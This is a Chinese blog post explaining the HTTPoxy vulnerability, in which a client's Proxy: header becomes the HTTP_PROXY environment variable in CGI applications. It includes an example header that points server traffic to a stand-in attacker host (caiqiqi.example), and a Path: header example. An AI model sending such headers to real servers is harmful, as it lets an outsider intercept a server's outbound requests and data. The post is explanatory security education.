HTTPoxy

最新推荐文章于 2021-09-13 14:26:13 发布
最新推荐文章于 2021-09-13 14:26:13 发布
阅读量513 收藏
点赞数 1
分类专栏: 安全 php 文章标签: HTTPoxy
安全 同时被 2 个专栏收录
264 篇文章 8 订阅
订阅专栏
php
20 篇文章 0 订阅
订阅专栏

这篇讲得非常亲切:
https://nakedsecurity.sophos.com/2016/07/19/httpoxy-the-disease-that-could-make-your-web-server-spring-a-leak/
这个是专门给HTTPoxy这个漏洞的网站:
https://httpoxy.org/
这个来自Laruence的博客:
http://www.laruence.com/2016/07/19/3101.html
来自360播报的分析:
http://bobao.360.cn/learning/detail/2903.html
A PoC for exploiting Guzzle’s HTTP_PROXY untrusted read
https://github.com/httpoxy/php-fpm-httpoxy-poc
HTTPoxy - CGI “HTTP_PROXY” variable name clash
https://access.redhat.com/security/vulnerabilities/httpoxy

HTTPoxy介绍

这个bug跟HTTP请求有关,还有跟代理(proxy)设置有关。
要弄清楚HTTPoxy,首先得弄清楚一个概念CGI(Common Gateway Interface)。比如PHP, Perl, Go, Python等。
Web请求,通常包含一些HTTP头,这些HTTP一方面会告诉服务器自己的相关信息,另一方面也会影响HTTP响应的结果。

从Web服务器到CGI脚本(比如PHP脚本)通过都是通过环境变量的方式来处理这些HTTP头的,不管是 Unix (e.g. the BSDs and OS X), Linux还是Windows。
其实就是一些以NAME=VALUE的方式存储在内存中的文本字符串,以便进程可以方便的访问它们。不管你打开Windows的cmd还是Linux/macOS的terminal,你都可以通过set命令查看当前terminal的环境变量。

RFC 2857提到说,为了更好地支持CGI子进程,那些支持CGI脚本的Web服务器应该将HTTP头的每个字段都添加到环境变量中,以使得原始HTTP头的每个字段都可以让CGI脚本访问。当然,为了避免冲突,CGI不能把每个HTTP头中的字段以同样的名字都添加到环境变量中。否则,如果有一个HTTP头叫Path:的话,会覆盖掉叫做PATH=的标准环境变量。这样会非常不安全,因为PATH=定义了去哪里找那些启动的程序。比如,可以构造一个Path: C:\Users\caiqiqi\Downloads的HTTP请求头字段,这样就欺骗CGI程序使它从一个非官方的地方读取程序。这样可能会造成RCE(Remote Code Execution)。

避免冲突

于是RFC 2857想到一个办法,
如果请求是HTTP协议的话,首先将HTTP请求头的每个字段的名字变成全大写,再在每个HTTP请求头的字符串前面加上一个HTTP_,来作为供CGI子进程处理的环境变量。并且,把HTTP请求头中的-替换成_。比如Content-Type,变成环境变量就是HTTP_CONTENT_TYPE。再比如HTTP头中Path:的字段就会变成HTTP_PATH=C:\Users\caiqiqi\Downloads
//TODO

So far, so good…

但是并不是所有的以HTTP_开头的环境变量本质上都是安全的。
比如很多Web友好的程序/工具(很可能会被CGI脚本调用)会把这样一个环境变量HTTP_PROXY=特殊看待,它们会用这个变量来设置自己的代理。换句话说,如果我构造这样一个HTTP请求头

Proxy: http://caiqiqi.example/crooked_proxy

处理这个请求的CGI脚本就会设置这样一个环境变量

HTTP_PROXY=http://caiqiqi.example/crooked_proxy

于是,在此之后的这些CGI脚本产生的向外的HTTP请求(比如数据库查询或者认证一个用户),都不会被直接处理,而是会先发到caiqiqi.example这个主机上(作为HTTP请求的proxy),都是因为之前的毫不知情的代理设置。

注意:其实wget和curl使用的都是小写的http_proxy,不会被这个影响到。 最开心的是wget/curl不受影响!

这可能会导致大规模的数据泄露。
//TODO

caiqiiqi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程代理漏洞httpoxy
张嘉嘉
07-22 1885
今天看了一篇新闻如是说:PHP 、Python 等网站应用远程代理漏洞httpoxy 于是怀着好奇心去搜了一下.具体内容大概如下: 首先 : 这里有一个核心的背景是, 我们习惯了使用一个名为”http_proxy”的环境变量来设置我们的请求代理,比如: http_proxy=127.0.0.1:9999 wget http://www.laruence.com/ 说明 :通过设置一
oxy:用于HTTP服务器和代理的中间件
02-22
含氧量 Oxy是一个带有HTTP处理程序的Go库,可增强HTTP标准库: 重试并缓冲请求和响应通过请求,支持具有可配置刷新间隔的分块编码请求转发到远程位置和重写头是循环负载均衡器Hystrix型断路器同时连接限制器速率限制...
HTTPoxy漏洞(CVE-2016-5385)
EC_Carrot的博客
07-01 348
漏洞背景 PHP 7.0.8及之前的版本中存在安全漏洞,该漏洞源于程序没有解决RFC 3875模式下的命名空间冲突。程序没有正确处理来自HTTP_PROXY环境变量中不可信客户端数据应用程序。远程攻击者借助HTTP请求中特制的Proxy header消息利用该漏洞实施中间人攻击,指引服务器发送连接到任意主机。 漏洞复现 我直接弃坑,但是有几位师傅写的都很不错: https://blog.csdn.net/JiangBuLiu/article/details/95218436 https://blog.cs
HTTPOXY 漏洞
weixin_45593546的博客
07-02 186
长久一来我们习惯了使用一个名为"http_proxy"的环境变量来设置我们的请求代理。 http_proxy=127.0.0.1:9999 wget http://www.laruence.com/ 在CGI(RFC 3875)的模式的时候, 会把请求中的Header, 加上HTTP_ 前缀, 注册为环境变量, 所以如果在Header中发送一个Proxy:xxxxxx, 那么 PHP 就会把他注册为HTTP_PROXY环境变量, 于是getenv(“HTTP_PROXY”)就变成可被控制的了. 那么如果所
HTTPOXY漏洞说明
terry198608的博客
03-17 358
这里有一个核心的背景是, 长久一来我们习惯了使用一个名为”http_proxy”的环境变量来设置我们的请求代理, 比如在命令行我们经常这么用: http_proxy=127.0.0.1:9999 wget http://www.laruence.com/ 通过设置一个http_proxy的环境变量, 让wget使用代理请求http://www.laruence.com/ 有据可考的是, 这样
【vulhub】httpoxy漏洞(CVE-2016-5385)
qq_45300786的博客
09-13 1057
这个httpoxy漏洞,简单来说,就是可以截获用户http请求包,从而获取到一些敏感信息。 httpoxy简单理解 https://blog.csdn.net/zuoside__lord/article/details/107696503 NC监听 https://blog.csdn.net/qq_34640691/article/details/115740809?utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRL
Flarum 0.1.0 beta7
04-30
Flarum是下一代论坛软件,使网上讨论更有乐趣,不仅如此,她还简单、...Flarum 0.1.0 beta7 更新日志:2017-05-23解决HTTPoxy漏洞的解决方法;拒绝访问Apache config中的composer文件和git目录;修复Vaprobash环境。
HTTPOXY漏洞下的思考
程序老兵的博客
07-19 873
晚晚刷微博看到最新爆出的httpoxy远程代理感染漏洞的介绍 今天中午看到鸟哥(风雪之隅)博客更新了:http://www.laruence.com/2016/07/19/3101.html 摘录重点: 在CGI(RFC 3875)的模式的时候, 会把请求中的Header, 加上HTTP_ 前缀, 注册为环境变量, 所以如果你在Header中发送一个Proxy:xxxxxx, 那么P
HTTPOXY -- CGI 环境变量劫持漏洞分析
weixin_33982670的博客
07-19 301
0x00 前言 昨晚,一个名为 HTTPOXY漏洞在安全圈内广泛传播。云盾攻防对抗团队第一时间对此漏洞进行了深入分析,发现其本质是一个 CGI 环境变量劫持漏洞,对 CGI 的环境变量HTTP_PROXY 变量进行劫持。如果 CGI 在运行过程中依赖 HTTP_PROXY,那么攻击者将能够获取到程序敏感数据,甚至伪造返回包对 CGI...
httpoxy漏洞远程攻击PHP Python应用
weixin_33924220的博客
09-01 213
httpoxy漏洞是一个刚暴露出来的漏洞,它针对 PHP、Go、Python 等语言的 CGI 应用的漏洞。它将apache等组件中用于代理HTTP访问的字段名变换为“HTTP_PROXY”,再传递给对应的CGI来执行。如果CGI或者脚本中对外请求的组件依赖于“HTTP_PROXY”这个环境变量,那就中招了,会导致远程攻击。 HTTP_Proxy...
【转】HTTPOXY漏洞说明
weixin_30364147的博客
07-19 69
作者: Laruence( ) 本文地址: http://www.laruence.com/2016/07/19/3101.html 转载请注明出处 好久没写文章了, 博客都长草了, 早上起来本来想去上班, 一看这么大雨, 这要上路了不得堵死啊. 再加上有同学对我昨天转发的微博HTTPOXY漏洞表示不理解, 问会不会影响普通应用, 于是就写篇文章介绍下, 等早高峰过了吧...
Vulhub漏洞系列:HTTPoxy漏洞(CVE-2016-5385)
weixin_43072923的博客
05-19 1742
Vulhub漏洞系列:HTTPoxy漏洞(CVE-2016-5385)00.前言:01.HTTPoxy简介02.漏洞描述03.漏洞复现 00.前言: 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.HTTPoxy简介   httpoxy是一个CGI应用环境的远程利用漏洞,影响一系列以PHP为主要代表的Web动态语言和Apache、Nginx等Web服务器。 02.漏洞描述   根据RFC 3875规定,CGI(fastcgi)要将用户传入的所
小说httpoxy
weixin_33874713的博客
09-02 99
前段时间爆出了httpoxy漏洞,从爆出到现在也有两个礼拜了,然而还是有许多人肯定心中还是会有疑问——httpoxy漏洞到底是什么。这里就让我们来一起看一下httpoxy漏洞到底是什么漏洞,它的成因及影响。首先,我们要知道什么是httpoxy漏洞。什么是httpoxy漏洞:具体来说, httpoxy是一组影响运行在CGI 或者类似CGI环境的漏洞集。http_poxy漏洞的...
httpoxy漏洞检测与处理
Enweitech Software Works
08-19 1319
昨天凌晨爆出的Httpoxy漏洞,是一个针对在CGI(RFC 3875)或类似CGI上运行程序的漏洞,它可以将请求中的Header,加上HTTP_前缀,注册为环境变量来使用,Header中的Proxy字段的内容直接变成程序的“HTTP_PROXY”环境变量。(“HTTP_PROXY”是一个配置代理是常见的环境变量。)从而导致HTTP_PROXY被污染。 漏洞测试 1. Apache环境
基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
05-31
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算机相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
六一儿童节快乐!(六一儿童节庆祝代码)Vue开发
05-31
六一儿童节快乐!(六一儿童节庆祝代码)Vue开发 like Project setup npm install Compiles and hot-reloads for development npm run serve Compiles and minifies for production npm run build Lints and fixes files npm run lint Customize configuration
uniapp聊天工具源码.zip
05-31
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
NX二次开发uc1603 函数介绍
05-31
NX二次开发uc1603 函数介绍,Ufun提供了一系列丰富的 API 函数,可以帮助用户实现自动化、定制化和扩展 NX 软件的功能。无论您是从事机械设计、制造、模具设计、逆向工程、CAE 分析等领域的专业人士,还是希望提高工作效率的普通用户,NX 二次开发 Ufun 都可以帮助您实现更高效的工作流程。函数覆盖了 NX 软件的各个方面,包括但不限于建模、装配、制图、编程、仿真等。这些 API 函数可以帮助用户轻松地实现自动化、定制化和扩展 NX 软件的功能。例如,用户可以通过 Ufun 编写脚本,自动化完成重复性的设计任务,提高设计效率;或者开发定制化的功能,满足特定的业务需求。语法简单易懂,易于学习和使用。用户可以快速上手并开发出符合自己需求的 NX 功能。本资源内容 提供了丰富的中英文帮助文档,可以帮助用户快速了解和使用 Ufun 的功能。用户可以通过资源中的提示,学习如何使用 Ufun 的 API 函数,以及如何实现特定的功能。
【目标检测数据集】遥感类军用飞机检测数据集3800张20类别VOC+YOLO格式.zip
最新发布
05-31
【目标检测数据集】遥感类军用飞机检测数据集3800张20类别VOC+YOLO格式.zip 数据集格式:Pascal VOC格式+YOLO格式(不包含分割路径的txt文件,仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数):3821 标注数量(xml文件个数):3821 标注数量(txt文件个数):3821 标注类别数:20 标注类别名称:["A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20"] 每个类别标注的框数: A1 框数 = 1646 A2 框数 = 1726 A3 框数 = 1164 A4 框数 = 642 A5 框数 = 1262 A6 框数 = 436 A7 框数 = 680 A8 框数 = 944 A9 框数 = 1073 A10 框数 = 924 A11 框数 = 501 A12 框数 = 702 A13 框数 = 1652 A14 框数 = 177
CVE-2016-5388
07-27
引用\[1\]:CVE-2016-5388是Apache Tomcat的CVE编号,它是指Apache Tomcat中的一个安全漏洞,即HTTPoxy漏洞。该漏洞会导致远程攻击者能够利用HTTP代理服务器来进行中间人攻击。受影响的发行版包括RHEL、CentOS等。\[1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值